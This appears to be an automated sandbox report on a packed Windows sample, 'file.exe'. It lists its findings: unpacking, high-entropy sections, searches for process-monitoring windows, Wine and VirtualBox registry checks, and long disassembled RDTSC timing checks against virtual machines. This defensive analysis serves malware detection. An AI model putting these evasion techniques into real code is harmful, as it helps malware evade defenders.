Source: Google Drive.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 1836032 > 1048576

Source: file.exe

Static PE information: Raw size of bfltexda is bigger than: 0x100000 < 0x196600

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2361037563.00000000085C0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.560000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bfltexda:EW;eysgebwh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bfltexda:EW;eysgebwh:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c9c08 should be: 0x1cc2b3

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: bfltexda
Source: file.exe	Static PE information: section name: eysgebwh
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130CC32 push ds; retf	0_3_0130CCB5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E52B push 543EA35Fh; mov dword ptr [esp], edi	0_3_0130E5C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E52B push 0CF473ADh; mov dword ptr [esp], edx	0_3_0130E5E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E52B push ebp; mov dword ptr [esp], ebx	0_3_0130E620
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E52B push ebp; mov dword ptr [esp], ecx	0_3_0130E649
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_012FC803 push FFFFFFDBh; iretd	0_3_012FC814
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E87C push edi; mov dword ptr [esp], 65257F99h	0_3_0130E9E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E87C push edx; mov dword ptr [esp], ecx	0_3_0130E9FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130CAB9 push ds; retf	0_3_0130CCB5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E5A9 push 543EA35Fh; mov dword ptr [esp], edi	0_3_0130E5C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E5A9 push 0CF473ADh; mov dword ptr [esp], edx	0_3_0130E5E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E5A9 push ebp; mov dword ptr [esp], ebx	0_3_0130E620
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E5A9 push ebp; mov dword ptr [esp], ecx	0_3_0130E649
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E595 push 543EA35Fh; mov dword ptr [esp], edi	0_3_0130E5C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E595 push 0CF473ADh; mov dword ptr [esp], edx	0_3_0130E5E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E595 push ebp; mov dword ptr [esp], ebx	0_3_0130E620
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E595 push ebp; mov dword ptr [esp], ecx	0_3_0130E649
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_012FCC81 push esi; retf	0_3_012FCC84
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0130E9E5 push edx; mov dword ptr [esp], ecx	0_3_0130E9FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_012AC670 push E00127F0h; retf	0_3_012AC675
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_012AC670 push E00127F0h; retf	0_3_012AC675
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_012AC670 push E00127F0h; retf	0_3_012AC675
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_012AC670 push E00127F0h; retf	0_3_012AC675

Source: file.exe	Static PE information: section name: entropy: 7.981874278944832
Source: file.exe	Static PE information: section name: bfltexda entropy: 7.954899185569

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BD02A second address: 5BC8C8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1CCF9D8CCh 0x00000008 jmp 00007FA1CCF9D8C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 jns 00007FA1CCF9D8B7h 0x00000018 push dword ptr [ebp+122D005Dh] 0x0000001e sub dword ptr [ebp+122D1B1Ah], edi 0x00000024 call dword ptr [ebp+122D1CDAh] 0x0000002a pushad 0x0000002b stc 0x0000002c xor eax, eax 0x0000002e jmp 00007FA1CCF9D8C5h 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 pushad 0x00000038 add ecx, dword ptr [ebp+122D34F8h] 0x0000003e and di, 9230h 0x00000043 popad 0x00000044 mov dword ptr [ebp+122D36E4h], eax 0x0000004a mov dword ptr [ebp+122D2B6Bh], edi 0x00000050 mov esi, 0000003Ch 0x00000055 mov dword ptr [ebp+122D2B6Bh], edi 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f pushad 0x00000060 mov ebx, dword ptr [ebp+122D3788h] 0x00000066 mov ah, 97h 0x00000068 popad 0x00000069 lodsw 0x0000006b xor dword ptr [ebp+122D2B6Bh], eax 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 clc 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D2B6Bh], edx 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007FA1CCF9D8C5h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BC8C8 second address: 5BC8CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BC8CE second address: 5BC8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72EF55 second address: 72EF5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72EF5A second address: 72EF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E1DA second address: 72E1DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E34C second address: 72E350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E350 second address: 72E359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E359 second address: 72E382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jbe 00007FA1CCF9D8B6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA1CCF9D8C4h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E382 second address: 72E392 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1CCCD2146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E62F second address: 72E634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E7F7 second address: 72E7FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E7FD second address: 72E801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E801 second address: 72E805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E805 second address: 72E80E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732556 second address: 73255A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73255A second address: 732560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7325DC second address: 7325E6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7325E6 second address: 7325EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7325EC second address: 732691 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e push eax 0x0000000f jmp 00007FA1CCCD2156h 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 mov dword ptr [ebp+122D29A0h], edi 0x0000001d sub edi, dword ptr [ebp+122D351Ch] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007FA1CCCD2148h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f jne 00007FA1CCCD2153h 0x00000045 jnl 00007FA1CCCD215Fh 0x0000004b call 00007FA1CCCD2149h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 ja 00007FA1CCCD2146h 0x00000059 je 00007FA1CCCD2146h 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732691 second address: 7326AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1CCF9D8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7326AC second address: 73270B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FA1CCCD2151h 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push esi 0x0000001c push ecx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 mov eax, dword ptr [eax] 0x00000023 jnc 00007FA1CCCD2154h 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d pushad 0x0000002e pushad 0x0000002f jmp 00007FA1CCCD2154h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73270B second address: 732782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b popad 0x0000000c pop eax 0x0000000d mov edi, dword ptr [ebp+122D3598h] 0x00000013 push 00000003h 0x00000015 mov ecx, esi 0x00000017 push 00000000h 0x00000019 mov edx, dword ptr [ebp+122D35ACh] 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FA1CCF9D8B8h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov edi, 4890C731h 0x00000040 add dword ptr [ebp+122D2B6Bh], edx 0x00000046 call 00007FA1CCF9D8B9h 0x0000004b push edx 0x0000004c js 00007FA1CCF9D8BCh 0x00000052 js 00007FA1CCF9D8B6h 0x00000058 pop edx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jo 00007FA1CCF9D8BCh 0x00000062 je 00007FA1CCF9D8B6h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732782 second address: 7327C5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1CCCD2148h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FA1CCCD2156h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA1CCCD2159h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73286E second address: 732874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732874 second address: 7328A3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1CCCD2148h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor dword ptr [ebp+122D2F2Bh], edi 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D350Ch] 0x0000001d push E7AB9DF2h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA1CCCD214Bh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732984 second address: 7329CF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1CCF9D8B8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub dword ptr [ebp+122D31F5h], eax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FA1CCF9D8B8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push 7F5EAE27h 0x00000036 pushad 0x00000037 ja 00007FA1CCF9D8B8h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7329CF second address: 732A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 7F5EAEA7h 0x0000000e mov esi, 1988CA01h 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FA1CCCD2148h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov di, BCF1h 0x00000033 mov dword ptr [ebp+122D2565h], esi 0x00000039 push 00000000h 0x0000003b mov edx, ebx 0x0000003d push 00000003h 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007FA1CCCD2148h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 or dword ptr [ebp+122D2869h], edi 0x0000005f mov dword ptr [ebp+122D1B1Ah], edx 0x00000065 call 00007FA1CCCD2149h 0x0000006a jno 00007FA1CCCD2166h 0x00000070 push eax 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 jns 00007FA1CCCD2146h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732A78 second address: 732A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732A96 second address: 732A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732A9A second address: 732A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732A9E second address: 732AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b je 00007FA1CCCD214Eh 0x00000011 jo 00007FA1CCCD2148h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 mov eax, dword ptr [eax] 0x0000001b push edi 0x0000001c push edi 0x0000001d push edi 0x0000001e pop edi 0x0000001f pop edi 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732AC8 second address: 732ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732ACF second address: 732AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74369F second address: 7436A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA1CCF9D8B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7436A9 second address: 7436AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753B51 second address: 753B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FA1CCF9D8B6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71DC11 second address: 71DC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71DC16 second address: 71DC1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71DC1C second address: 71DC20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71DC20 second address: 71DC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FA1CCF9D8B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A4D second address: 751A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA1CCCD2146h 0x00000009 jmp 00007FA1CCCD2151h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jnc 00007FA1CCCD2155h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007FA1CCCD2150h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A99 second address: 751A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A9D second address: 751AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751AB0 second address: 751AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751AB6 second address: 751ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751ABC second address: 751AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751D69 second address: 751D7B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FA1CCCD2146h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751EC1 second address: 751EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751EC5 second address: 751EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751EC9 second address: 751ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751ED3 second address: 751EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA1CCCD2146h 0x0000000a rdtsc
